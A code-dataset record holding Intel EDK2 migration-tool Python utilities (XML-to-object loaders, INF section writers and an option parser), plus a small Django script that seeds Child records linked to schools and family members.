GuidProtocolPpiCommon\n\n\ndef LoadPcd(XmlPcd):\n \"\"\"Return a new PcdClass object equivalent to XmlPcd\"\"\"\n Pcd = PcdClass()\n XmlTag = 'PcdEntry/C_Name'\n Pcd.CName = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/Token'\n Pcd.Token = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/TokenSpaceGuidCName'\n Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/DatumType'\n Pcd.DatumType = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/MaxDatumSize'\n Pcd.MaxDatumSize = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/DefaultValue'\n Pcd.DefaultValue = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdItemType'\n Pcd.ItemType = XmlAttribute(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/ValidUsage'\n Pcd.ValidUsage = XmlElement(XmlPcd, XmlTag).split()\n XmlTag = 'SupModuleList'\n Pcd.SupModuleList = XmlAttribute(XmlPcd, XmlTag).split()\n SetCommon(Pcd, XmlPcd)\n return Pcd\n\n\ndef LoadLibraryClass(XmlLibraryClass):\n LibraryClass = LibraryClassClass()\n XmlTag = 'LibraryClass/Keyword'\n LibraryClass.LibraryClass = XmlElement(XmlLibraryClass, XmlTag)\n if LibraryClass.LibraryClass == '':\n XmlTag = 'Name'\n LibraryClass.LibraryClass = XmlAttribute(XmlLibraryClass, XmlTag)\n XmlTag = 'LibraryClass/IncludeHeader'\n LibraryClass.IncludeHeader = XmlElement(XmlLibraryClass, XmlTag)\n XmlTag = 'RecommendedInstanceVersion'\n RecommendedInstanceVersion = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.RecommendedInstanceVersion = RecommendedInstanceVersion\n XmlTag = 'RecommendedInstanceGuid'\n RecommendedInstanceGuid = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.RecommendedInstanceGuid = RecommendedInstanceGuid\n XmlTag = 'SupModuleList'\n SupModules = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.SupModuleList = SupModules.split()\n SetCommon(LibraryClass, XmlLibraryClass)\n return LibraryClass\n\n\ndef LoadBuildOption(XmlBuildOption):\n \"\"\"Return a new BuildOptionClass object equivalent to XmlBuildOption\"\"\"\n BuildOption = 
BuildOptionClass()\n BuildOption.Option = XmlElementData(XmlBuildOption)\n XmlTag = 'BuildTargets'\n BuildOption.BuildTargetList = XmlAttribute(XmlBuildOption, XmlTag).split()\n XmlTag = 'ToolChainFamily'\n BuildOption.ToolChainFamily = XmlAttribute(XmlBuildOption, XmlTag)\n XmlTag = 'TagName'\n BuildOption.TagName = XmlAttribute(XmlBuildOption, XmlTag)\n XmlTag = 'ToolCode'\n BuildOption.ToolCode = XmlAttribute(XmlBuildOption, XmlTag)\n XmlTag = 'SupArchList'\n BuildOption.SupArchList = XmlAttribute(XmlBuildOption, XmlTag).split()\n return BuildOption\n\n\ndef LoadUserExtensions(XmlUserExtensions):\n UserExtensions = UserExtensionsClass()\n XmlTag = 'UserID'\n UserExtensions.UserID = XmlAttribute(XmlUserExtensions, XmlTag)\n XmlTag = 'Identifier'\n UserExtensions.Identifier = XmlAttribute(XmlUserExtensions, XmlTag)\n UserExtensions.Content = XmlElementData(XmlUserExtensions)\n return UserExtensions\n\n\ndef StoreTextFile(TextFile, Content):\n EdkLogger.verbose(Content)\n TextFile.write(Content)\n\n\ndef AddToSection(Section, Arch, Item):\n SectionArch = Section.get(Arch, [])\n if Item not in SectionArch:\n SectionArch.append(Item)\n Section[Arch] = SectionArch\n\n\ndef GetSection(SectionName, Method, ObjectList):\n SupportedArches = ['common', 'Ia32', 'X64', 'Ipf', 'Ebc', 'ARM', 'AARCH64']\n SectionDict = {}\n for Object in ObjectList:\n Item = Method(Object)\n if Item == '':\n continue\n Item = ' %s' % Item\n Arches = Object.SupArchList\n if len(Arches) == 0:\n AddToSection(SectionDict, 'common', Item)\n else:\n for Arch in SupportedArches:\n if Arch.upper() in Arches:\n AddToSection(SectionDict, Arch, Item)\n Section = ''\n for Arch in SupportedArches:\n SectionArch = '\\n'.join(SectionDict.get(Arch, []))\n if SectionArch != '':\n Section += '[%s.%s]\\n%s\\n' % (SectionName, Arch, SectionArch)\n Section += '\\n'\n if Section != '':\n Section += '\\n'\n return Section\n\n\ndef StoreHeader(TextFile, CommonHeader):\n CopyRight = CommonHeader.Copyright\n Abstract = 
CommonHeader.Abstract\n Description = CommonHeader.Description\n License = CommonHeader.License\n Header = '#/** @file\\n#\\n'\n Header += '# ' + Abstract + '\\n#\\n'\n Header += '# ' + Description.strip().replace('\\n', '\\n# ') + '\\n'\n Header += '# ' + CopyRight + '\\n#\\n'\n Header += '# ' + License.replace('\\n', '\\n# ').replace(' ', ' ')\n Header += '\\n#\\n#**/\\n\\n'\n StoreTextFile(TextFile, Header)\n\n\ndef StoreDefinesSection(TextFile, DefinesTupleList):\n Section = '[Defines]\\n'\n for DefineItem in DefinesTupleList:\n Section += ' %-30s = %s\\n' % DefineItem\n Section += '\\n\\n'\n StoreTextFile(TextFile, Section)\n\n\ndef GetUserExtensions(UserExtensions):\n UserId = UserExtensions.UserID\n Identifier = UserExtensions.Identifier\n Content = UserExtensions.Content\n return '[UserExtensions.%s.%s]\\n %s\\n\\n' % (UserId, Identifier, Content)\n\n\nmReEquation = re.compile('\\\\s*(\\\\S+)\\\\s*=\\\\s*(\\\\S*)\\\\s*')\n\n\ndef GetTextFileInfo(FileName, TagTuple):\n ValueTuple = [''] * len(TagTuple)\n try:\n for Line in open(FileName):\n Line = Line.split('#', 1)[0]\n MatchEquation = mReEquation.match(Line)\n if MatchEquation:\n Tag = MatchEquation.group(1).upper()\n Value = MatchEquation.group(2)\n for Index in range(len(TagTuple)):\n if TagTuple[Index] == Tag:\n ValueTuple[Index] = Value\n except:\n EdkLogger.info('IO Error in reading file %s' % FileName)\n return ValueTuple\n\n\ndef GetXmlFileInfo(FileName, TagTuple):\n XmlDom = XmlParseFile(FileName)\n return tuple([XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple])\n\n\ndef MigrationOptionParser(Source, Destinate, ToolName, VersionNumber=1.0):\n UsageString = '%s [-a] [-v|-q] [-o <output_file>] <input_file>' % ToolName\n Version = '%s Version %.2f' % (ToolName, VersionNumber)\n Copyright = 'Copyright (c) 2007, Intel Corporation. 
All rights reserved.'\n Parser = OptionParser(description=Copyright, version=Version, usage=\n UsageString)\n Parser.add_option('-o', '--output', dest='OutputFile', help=\n 'The name of the %s file to be created.' % Destinate)\n Parser.add_option('-a', '--auto', dest='AutoWrite', action='store_true',\n default=False, help=\n 'Automatically create the %s file using the name of the %s file and replacing file extension'\n % (Source, Destinate))\n Parser.add_option('-q', '--quiet', action='store_true', type=None, help\n ='Disable all messages except FATAL ERRORS.')\n Parser.add_option('-v', '--verbose', action='store_true', type=None,\n help='Turn on verbose output with informational messages printed.')\n Options, Args = Parser.parse_args()\n if Options.verbose:\n EdkLogger.setLevel(EdkLogger.VERBOSE)\n elif Options.quiet:\n EdkLogger.setLevel(EdkLogger.QUIET)\n else:\n EdkLogger.setLevel(EdkLogger.INFO)\n if len(Args) == 0:\n raise MigrationError(PARAMETER_MISSING, name='Input file', usage=\n Parser.get_usage())\n if len(Args) > 1:\n raise MigrationError(PARAMETER_INVALID, name='Too many input files',\n usage=Parser.get_usage())\n InputFile = Args[0]\n if not os.path.exists(InputFile):\n raise MigrationError(FILE_NOT_FOUND, name=InputFile)\n if Options.OutputFile:\n if Options.AutoWrite:\n raise MigrationError(OPTION_CONFLICT, arg1='-o', arg2='-a',\n usage=Parser.get_usage())\n elif Options.AutoWrite:\n Options.OutputFile = os.path.splitext(InputFile)[0\n ] + '.' + Destinate.lower()\n else:\n raise MigrationError(OPTION_MISSING, name='-o', usage=Parser.\n get_usage())\n return Options, InputFile\n\n\nif __name__ == '__main__':\n pass\n",
"step-5": "## @file\n# Contains several utilitities shared by migration tools.\n#\n# Copyright (c) 2007 - 2014, Intel Corporation. All rights reserved.<BR>\n# This program and the accompanying materials\n# are licensed and made available under the terms and conditions of the BSD License\n# which accompanies this distribution. The full text of the license may be found at\n# http://opensource.org/licenses/bsd-license.php\n#\n# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.\n#\n\n##\n# Import Modules\n#\nimport Common.LongFilePathOs as os\nimport re\nimport EdkLogger\nfrom optparse import OptionParser\nfrom Common.BuildToolError import *\nfrom XmlRoutines import *\nfrom CommonDataClass.CommonClass import *\nfrom Common.LongFilePathSupport import OpenLongFilePath as open\n\n## Set all fields of CommonClass object.\n#\n# Set all attributes of CommonClass object from XML Dom object of XmlCommon.\n#\n# @param Common The destine CommonClass object.\n# @param XmlCommon The source XML Dom object.\n#\ndef SetCommon(Common, XmlCommon):\n XmlTag = \"Usage\"\n Common.Usage = XmlAttribute(XmlCommon, XmlTag).split()\n\n XmlTag = \"FeatureFlag\"\n Common.FeatureFlag = XmlAttribute(XmlCommon, XmlTag)\n\n XmlTag = \"SupArchList\"\n Common.SupArchList = XmlAttribute(XmlCommon, XmlTag).split()\n\n XmlTag = XmlNodeName(XmlCommon) + \"/\" + \"HelpText\"\n Common.HelpText = XmlElement(XmlCommon, XmlTag)\n\n\n## Set some fields of CommonHeaderClass object.\n#\n# Set Name, Guid, FileName and FullPath fields of CommonHeaderClass object from\n# XML Dom object of XmlCommonHeader, NameTag and FileName.\n#\n# @param CommonHeader The destine CommonClass object.\n# @param XmlCommonHeader The source XML Dom object.\n# @param NameTag The name tag in XML Dom object.\n# @param FileName The file name of the XML file.\n#\ndef SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):\n 
XmlParentTag = XmlNodeName(XmlCommonHeader)\n\n XmlTag = XmlParentTag + \"/\" + NameTag\n CommonHeader.Name = XmlElement(XmlCommonHeader, XmlTag)\n\n XmlTag = XmlParentTag + \"/\" + \"GuidValue\"\n CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlTag)\n\n XmlTag = XmlParentTag + \"/\" + \"Version\"\n CommonHeader.Version = XmlElement(XmlCommonHeader, XmlTag)\n\n CommonHeader.FileName = os.path.basename(FileName)\n CommonHeader.FullPath = os.path.abspath(FileName)\n\n\n## Regular expression to match specification and value.\nmReSpecification = re.compile(r\"(?P<Specification>\\w+)\\s+(?P<Value>\\w*)\")\n\n## Add specification to specification dictionary.\n#\n# Abstract specification name, value pair from Specification String and add them\n# to specification dictionary.\n#\n# @param SpecificationDict The destine Specification dictionary.\n# @param SpecificationString The source Specification String from which the\n# specification name and value pair is abstracted.\n#\ndef AddToSpecificationDict(SpecificationDict, SpecificationString):\n \"\"\"Abstract specification name, value pair from Specification String\"\"\"\n for SpecificationMatch in mReSpecification.finditer(SpecificationString):\n Specification = SpecificationMatch.group(\"Specification\")\n Value = SpecificationMatch.group(\"Value\")\n SpecificationDict[Specification] = Value\n\n## Set all fields of CommonHeaderClass object.\n#\n# Set all attributes of CommonHeaderClass object from XML Dom object of\n# XmlCommonHeader, NameTag and FileName.\n#\n# @param CommonHeader The destine CommonClass object.\n# @param XmlCommonHeader The source XML Dom object.\n# @param NameTag The name tag in XML Dom object.\n# @param FileName The file name of the XML file.\n#\ndef SetCommonHeader(CommonHeader, XmlCommonHeader):\n \"\"\"Set all attributes of CommonHeaderClass object from XmlCommonHeader\"\"\"\n XmlParent = XmlNodeName(XmlCommonHeader)\n\n XmlTag = XmlParent + \"/\" + \"Abstract\"\n CommonHeader.Abstract = 
XmlElement(XmlCommonHeader, XmlTag)\n\n XmlTag = XmlParent + \"/\" + \"Description\"\n CommonHeader.Description = XmlElement(XmlCommonHeader, XmlTag)\n\n XmlTag = XmlParent + \"/\" + \"Copyright\"\n CommonHeader.Copyright = XmlElement(XmlCommonHeader, XmlTag)\n\n XmlTag = XmlParent + \"/\" + \"License\"\n CommonHeader.License = XmlElement(XmlCommonHeader, XmlTag)\n\n XmlTag = XmlParent + \"/\" + \"Specification\"\n Specification = XmlElement(XmlCommonHeader, XmlTag)\n\n AddToSpecificationDict(CommonHeader.Specification, Specification)\n\n XmlTag = XmlParent + \"/\" + \"ModuleType\"\n CommonHeader.ModuleType = XmlElement(XmlCommonHeader, XmlTag)\n\n\n## Load a new Cloned Record class object.\n#\n# Read an input XML ClonedRecord DOM object and return an object of Cloned Record\n# contained in the DOM object.\n#\n# @param XmlCloned A child XML DOM object in a Common XML DOM.\n#\n# @retvel ClonedRecord A new Cloned Record object created by XmlCloned.\n#\ndef LoadClonedRecord(XmlCloned):\n ClonedRecord = ClonedRecordClass()\n\n XmlTag = \"Id\"\n ClonedRecord.Id = int(XmlAttribute(XmlCloned, XmlTag))\n\n XmlTag = \"FarGuid\"\n ClonedRecord.FarGuid = XmlAttribute(XmlCloned, XmlTag)\n\n XmlTag = \"Cloned/PackageGuid\"\n ClonedRecord.PackageGuid = XmlElement(XmlCloned, XmlTag)\n\n XmlTag = \"Cloned/PackageVersion\"\n ClonedRecord.PackageVersion = XmlElement(XmlCloned, XmlTag)\n\n XmlTag = \"Cloned/ModuleGuid\"\n ClonedRecord.ModuleGuid = XmlElement(XmlCloned, XmlTag)\n\n XmlTag = \"Cloned/ModuleVersion\"\n ClonedRecord.ModuleVersion = XmlElement(XmlCloned, XmlTag)\n\n return ClonedRecord\n\n\n## Load a new Guid/Protocol/Ppi common class object.\n#\n# Read an input XML Guid/Protocol/Ppi DOM object and return an object of\n# Guid/Protocol/Ppi contained in the DOM object.\n#\n# @param XmlGuidProtocolPpiCommon A child XML DOM object in a Common XML DOM.\n#\n# @retvel GuidProtocolPpiCommon A new GuidProtocolPpiCommon class object\n# created by XmlGuidProtocolPpiCommon.\n#\ndef 
LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):\n GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()\n\n XmlTag = \"Name\"\n GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n\n XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)\n if XmlParent == \"Entry\":\n XmlTag = \"%s/C_Name\" % XmlParent\n elif XmlParent == \"GuidCNames\":\n XmlTag = \"%s/GuidCName\" % XmlParent\n else:\n XmlTag = \"%s/%sCName\" % (XmlParent, XmlParent)\n\n GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n\n XmlTag = XmlParent + \"/\" + \"GuidValue\"\n GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n\n if XmlParent.endswith(\"Notify\"):\n GuidProtocolPpiCommon.Notify = True\n\n XmlTag = \"GuidTypeList\"\n GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()\n\n XmlTag = \"SupModuleList\"\n SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.SupModuleList = SupModules.split()\n\n SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)\n\n return GuidProtocolPpiCommon\n\n\n## Load a new Pcd class object.\n#\n# Read an input XML Pcd DOM object and return an object of Pcd\n# contained in the DOM object.\n#\n# @param XmlPcd A child XML DOM object in a Common XML DOM.\n#\n# @retvel Pcd A new Pcd object created by XmlPcd.\n#\ndef LoadPcd(XmlPcd):\n \"\"\"Return a new PcdClass object equivalent to XmlPcd\"\"\"\n Pcd = PcdClass()\n\n XmlTag = \"PcdEntry/C_Name\"\n Pcd.CName = XmlElement(XmlPcd, XmlTag)\n\n XmlTag = \"PcdEntry/Token\"\n Pcd.Token = XmlElement(XmlPcd, XmlTag)\n\n XmlTag = \"PcdEntry/TokenSpaceGuidCName\"\n Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, XmlTag)\n\n XmlTag = \"PcdEntry/DatumType\"\n Pcd.DatumType = XmlElement(XmlPcd, XmlTag)\n\n XmlTag = \"PcdEntry/MaxDatumSize\"\n Pcd.MaxDatumSize = XmlElement(XmlPcd, XmlTag)\n\n XmlTag = \"PcdEntry/DefaultValue\"\n Pcd.DefaultValue = XmlElement(XmlPcd, 
XmlTag)\n\n XmlTag = \"PcdItemType\"\n Pcd.ItemType = XmlAttribute(XmlPcd, XmlTag)\n\n XmlTag = \"PcdEntry/ValidUsage\"\n Pcd.ValidUsage = XmlElement(XmlPcd, XmlTag).split()\n\n XmlTag = \"SupModuleList\"\n Pcd.SupModuleList = XmlAttribute(XmlPcd, XmlTag).split()\n\n SetCommon(Pcd, XmlPcd)\n\n return Pcd\n\n\n## Load a new LibraryClass class object.\n#\n# Read an input XML LibraryClass DOM object and return an object of LibraryClass\n# contained in the DOM object.\n#\n# @param XmlLibraryClass A child XML DOM object in a Common XML DOM.\n#\n# @retvel LibraryClass A new LibraryClass object created by XmlLibraryClass.\n#\ndef LoadLibraryClass(XmlLibraryClass):\n LibraryClass = LibraryClassClass()\n\n XmlTag = \"LibraryClass/Keyword\"\n LibraryClass.LibraryClass = XmlElement(XmlLibraryClass, XmlTag)\n if LibraryClass.LibraryClass == \"\":\n XmlTag = \"Name\"\n LibraryClass.LibraryClass = XmlAttribute(XmlLibraryClass, XmlTag)\n\n XmlTag = \"LibraryClass/IncludeHeader\"\n LibraryClass.IncludeHeader = XmlElement(XmlLibraryClass, XmlTag)\n\n XmlTag = \"RecommendedInstanceVersion\"\n RecommendedInstanceVersion = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.RecommendedInstanceVersion = RecommendedInstanceVersion\n\n XmlTag = \"RecommendedInstanceGuid\"\n RecommendedInstanceGuid = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.RecommendedInstanceGuid = RecommendedInstanceGuid\n\n XmlTag = \"SupModuleList\"\n SupModules = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.SupModuleList = SupModules.split()\n\n SetCommon(LibraryClass, XmlLibraryClass)\n\n return LibraryClass\n\n\n## Load a new Build Option class object.\n#\n# Read an input XML BuildOption DOM object and return an object of Build Option\n# contained in the DOM object.\n#\n# @param XmlBuildOption A child XML DOM object in a Common XML DOM.\n#\n# @retvel BuildOption A new Build Option object created by XmlBuildOption.\n#\ndef LoadBuildOption(XmlBuildOption):\n \"\"\"Return a new BuildOptionClass 
object equivalent to XmlBuildOption\"\"\"\n BuildOption = BuildOptionClass()\n\n BuildOption.Option = XmlElementData(XmlBuildOption)\n\n XmlTag = \"BuildTargets\"\n BuildOption.BuildTargetList = XmlAttribute(XmlBuildOption, XmlTag).split()\n\n XmlTag = \"ToolChainFamily\"\n BuildOption.ToolChainFamily = XmlAttribute(XmlBuildOption, XmlTag)\n\n XmlTag = \"TagName\"\n BuildOption.TagName = XmlAttribute(XmlBuildOption, XmlTag)\n\n XmlTag = \"ToolCode\"\n BuildOption.ToolCode = XmlAttribute(XmlBuildOption, XmlTag)\n\n XmlTag = \"SupArchList\"\n BuildOption.SupArchList = XmlAttribute(XmlBuildOption, XmlTag).split()\n\n return BuildOption\n\n\n## Load a new User Extensions class object.\n#\n# Read an input XML UserExtensions DOM object and return an object of User\n# Extensions contained in the DOM object.\n#\n# @param XmlUserExtensions A child XML DOM object in a Common XML DOM.\n#\n# @retvel UserExtensions A new User Extensions object created by\n# XmlUserExtensions.\n#\ndef LoadUserExtensions(XmlUserExtensions):\n UserExtensions = UserExtensionsClass()\n\n XmlTag = \"UserID\"\n UserExtensions.UserID = XmlAttribute(XmlUserExtensions, XmlTag)\n\n XmlTag = \"Identifier\"\n UserExtensions.Identifier = XmlAttribute(XmlUserExtensions, XmlTag)\n\n UserExtensions.Content = XmlElementData(XmlUserExtensions)\n\n return UserExtensions\n\n\n## Store content to a text file object.\n#\n# Write some text file content to a text file object. 
The contents may echo\n# in screen in a verbose way.\n#\n# @param TextFile The text file object.\n# @param Content The string object to be written to a text file.\n#\ndef StoreTextFile(TextFile, Content):\n EdkLogger.verbose(Content)\n TextFile.write(Content)\n\n\n## Add item to a section.\n#\n# Add an Item with specific CPU architecture to section dictionary.\n# The possible duplication is ensured to be removed.\n#\n# @param Section Section dictionary indexed by CPU architecture.\n# @param Arch CPU architecture: Ia32, X64, Ipf, ARM, AARCH64, Ebc or Common.\n# @param Item The Item to be added to section dictionary.\n#\ndef AddToSection(Section, Arch, Item):\n SectionArch = Section.get(Arch, [])\n if Item not in SectionArch:\n SectionArch.append(Item)\n Section[Arch] = SectionArch\n\n\n## Get section contents.\n#\n# Return the content of section named SectionName.\n# the contents is based on Methods and ObjectLists.\n#\n# @param SectionName The name of the section.\n# @param Method A function returning a string item of an object.\n# @param ObjectList The list of object.\n#\n# @retval Section The string content of a section.\n#\ndef GetSection(SectionName, Method, ObjectList):\n SupportedArches = [\"common\", \"Ia32\", \"X64\", \"Ipf\", \"Ebc\", \"ARM\", \"AARCH64\"]\n SectionDict = {}\n for Object in ObjectList:\n Item = Method(Object)\n if Item == \"\":\n continue\n Item = \" %s\" % Item\n Arches = Object.SupArchList\n if len(Arches) == 0:\n AddToSection(SectionDict, \"common\", Item)\n else:\n for Arch in SupportedArches:\n if Arch.upper() in Arches:\n AddToSection(SectionDict, Arch, Item)\n\n Section = \"\"\n for Arch in SupportedArches:\n SectionArch = \"\\n\".join(SectionDict.get(Arch, []))\n if SectionArch != \"\":\n Section += \"[%s.%s]\\n%s\\n\" % (SectionName, Arch, SectionArch)\n Section += \"\\n\"\n if Section != \"\":\n Section += \"\\n\"\n return Section\n\n\n## Store file header to a text file.\n#\n# Write standard file header to a text file. 
The content includes copyright,\n# abstract, description and license extracted from CommonHeader class object.\n#\n# @param TextFile The text file object.\n# @param CommonHeader The source CommonHeader class object.\n#\ndef StoreHeader(TextFile, CommonHeader):\n CopyRight = CommonHeader.Copyright\n Abstract = CommonHeader.Abstract\n Description = CommonHeader.Description\n License = CommonHeader.License\n\n Header = \"#/** @file\\n#\\n\"\n Header += \"# \" + Abstract + \"\\n#\\n\"\n Header += \"# \" + Description.strip().replace(\"\\n\", \"\\n# \") + \"\\n\"\n Header += \"# \" + CopyRight + \"\\n#\\n\"\n Header += \"# \" + License.replace(\"\\n\", \"\\n# \").replace(\" \", \" \")\n Header += \"\\n#\\n#**/\\n\\n\"\n\n StoreTextFile(TextFile, Header)\n\n## Store file header to a text file.\n#\n# Write Defines section to a text file. DefinesTupleList determines the content.\n#\n# @param TextFile The text file object.\n# @param DefinesTupleList The list of (Tag, Value) to be added as one item.\n#\ndef StoreDefinesSection(TextFile, DefinesTupleList):\n Section = \"[Defines]\\n\"\n for DefineItem in DefinesTupleList:\n Section += \" %-30s = %s\\n\" % DefineItem\n\n Section += \"\\n\\n\"\n StoreTextFile(TextFile, Section)\n\n\n## Return one User Extension section.\n#\n# Read the input UserExtentsions class object and return one section.\n#\n# @param UserExtensions An input UserExtensions class object.\n#\n# @retval UserExtensionSection A section representing UserExtensions object.\n#\ndef GetUserExtensions(UserExtensions):\n UserId = UserExtensions.UserID\n Identifier = UserExtensions.Identifier\n Content = UserExtensions.Content\n\n return \"[UserExtensions.%s.%s]\\n %s\\n\\n\" % (UserId, Identifier, Content)\n\n## Regular expression to match an equation.\nmReEquation = re.compile(r\"\\s*(\\S+)\\s*=\\s*(\\S*)\\s*\")\n\n## Return a value tuple matching information in a text fle.\n#\n# Parse the text file and return a value tuple corresponding to an input tag\n# tuple. 
In case of any error, an tuple of empty strings is returned.\n#\n# @param FileName The file name of the text file.\n# @param TagTuple A tuple of tags as the key to the value.\n#\n# @param ValueTupe The returned tuple corresponding to the tag tuple.\n#\ndef GetTextFileInfo(FileName, TagTuple):\n ValueTuple = [\"\"] * len(TagTuple)\n try:\n for Line in open(FileName):\n Line = Line.split(\"#\", 1)[0]\n MatchEquation = mReEquation.match(Line)\n if MatchEquation:\n Tag = MatchEquation.group(1).upper()\n Value = MatchEquation.group(2)\n for Index in range(len(TagTuple)):\n if TagTuple[Index] == Tag:\n ValueTuple[Index] = Value\n except:\n EdkLogger.info(\"IO Error in reading file %s\" % FileName)\n\n return ValueTuple\n\n\n## Return a value tuple matching information in an XML fle.\n#\n# Parse the XML file and return a value tuple corresponding to an input tag\n# tuple. In case of any error, an tuple of empty strings is returned.\n#\n# @param FileName The file name of the XML file.\n# @param TagTuple A tuple of tags as the key to the value.\n#\n# @param ValueTupe The returned tuple corresponding to the tag tuple.\n#\ndef GetXmlFileInfo(FileName, TagTuple):\n XmlDom = XmlParseFile(FileName)\n return tuple([XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple])\n\n\n## Parse migration command line options\n#\n# Use standard Python module optparse to parse command line option of this tool.\n#\n# @param Source The source file type.\n# @param Destinate The destinate file type.\n#\n# @retval Options A optparse object containing the parsed options.\n# @retval InputFile Path of an source file to be migrated.\n#\ndef MigrationOptionParser(Source, Destinate, ToolName, VersionNumber = 1.0):\n # use clearer usage to override default usage message\n UsageString = \"%s [-a] [-v|-q] [-o <output_file>] <input_file>\" % ToolName\n Version = \"%s Version %.2f\" % (ToolName, VersionNumber)\n Copyright = \"Copyright (c) 2007, Intel Corporation. 
All rights reserved.\"\n\n Parser = OptionParser(description=Copyright, version=Version, usage=UsageString)\n Parser.add_option(\"-o\", \"--output\", dest=\"OutputFile\", help=\"The name of the %s file to be created.\" % Destinate)\n Parser.add_option(\"-a\", \"--auto\", dest=\"AutoWrite\", action=\"store_true\", default=False, help=\"Automatically create the %s file using the name of the %s file and replacing file extension\" % (Source, Destinate))\n Parser.add_option(\"-q\", \"--quiet\", action=\"store_true\", type=None, help=\"Disable all messages except FATAL ERRORS.\")\n Parser.add_option(\"-v\", \"--verbose\", action=\"store_true\", type=None, help=\"Turn on verbose output with informational messages printed.\")\n\n Options, Args = Parser.parse_args()\n\n # Set logging level\n if Options.verbose:\n EdkLogger.setLevel(EdkLogger.VERBOSE)\n elif Options.quiet:\n EdkLogger.setLevel(EdkLogger.QUIET)\n else:\n EdkLogger.setLevel(EdkLogger.INFO)\n\n # error check\n if len(Args) == 0:\n raise MigrationError(PARAMETER_MISSING, name=\"Input file\", usage=Parser.get_usage())\n if len(Args) > 1:\n raise MigrationError(PARAMETER_INVALID, name=\"Too many input files\", usage=Parser.get_usage())\n\n InputFile = Args[0]\n if not os.path.exists(InputFile):\n raise MigrationError(FILE_NOT_FOUND, name=InputFile)\n\n if Options.OutputFile:\n if Options.AutoWrite:\n raise MigrationError(OPTION_CONFLICT, arg1=\"-o\", arg2=\"-a\", usage=Parser.get_usage())\n else:\n if Options.AutoWrite:\n Options.OutputFile = os.path.splitext(InputFile)[0] + \".\" + Destinate.lower()\n else:\n raise MigrationError(OPTION_MISSING, name=\"-o\", usage=Parser.get_usage())\n\n return Options, InputFile\n\n# This acts like the main() function for the script, unless it is 'import'ed\n# into another script.\nif __name__ == '__main__':\n pass\n",
"step-ids": [
11,
18,
20,
21,
23
]
}
|
[
11,
18,
20,
21,
23
] |
""" Python Package Support """
# Not applicable
""" Django Package Support """
# Not applicable
""" Internal Package Support """
from Data_Base.models import School, Person, Child
"""
Data_Base/Data/Imports/child_import.py
Author: Matthew J Swann;
Yong Kin;
Bradon Atkins; and
Adam Carter
Version: 1.0
Last Update: 2013-04-07
Update By: Matthew J Swann
Importing data to the person table.
"""
class ChildImport(object):
def __init__(self, scriptName=None):
# 1
x = Child.objects.create(
first_name = 'Timmy',
last_name = 'Thompson',
school = School.objects.get(pk=1),
)
x.family.add(Person.objects.get(pk=1))
x.family.add(Person.objects.get(pk=2))
x.save()
# 2
x = Child.objects.create(
first_name = 'Jimmy',
last_name = 'Johnson',
school = School.objects.get(pk=2),
)
x.family.add(Person.objects.get(pk=2))
x.family.add(Person.objects.get(pk=1))
x.save()
# 3
x = Child.objects.create(
first_name = 'Bart',
last_name = 'Simpson',
school = School.objects.get(pk=3),
)
x.family.add(Person.objects.get(pk=3))
x.family.add(Person.objects.get(pk=4))
x.save()
# 4
x = Child.objects.create(
first_name = 'Lisa',
last_name = 'Simpson',
school = School.objects.get(pk=4),
)
x.family.add(Person.objects.get(pk=4))
x.family.add(Person.objects.get(pk=3))
x.save()
# 5
x = Child.objects.create(
first_name = 'Andrew',
last_name = 'Becker',
school = School.objects.get(pk=5),
)
x.family.add(Person.objects.get(pk=5))
x.family.add(Person.objects.get(pk=6))
x.save()
# 6
x = Child.objects.create(
first_name = 'Jasmine',
last_name = 'Goulette',
school = School.objects.get(pk=6),
)
x.family.add(Person.objects.get(pk=6))
x.family.add(Person.objects.get(pk=5))
x.save()
# 7
x = Child.objects.create(
first_name = 'Kristina',
last_name = 'Murry',
school = School.objects.get(pk=7),
)
x.family.add(Person.objects.get(pk=7))
x.family.add(Person.objects.get(pk=8))
x.save()
# 8
x = Child.objects.create(
first_name = 'Andrew',
last_name = 'Scheonster',
school = School.objects.get(pk=8),
)
x.family.add(Person.objects.get(pk=8))
x.family.add(Person.objects.get(pk=7))
x.save()
|
normal
|
{
"blob_id": "d0287b057530883a50ad9c1e5e74dce10cd825b6",
"index": 7961,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass ChildImport(object):\n <mask token>\n",
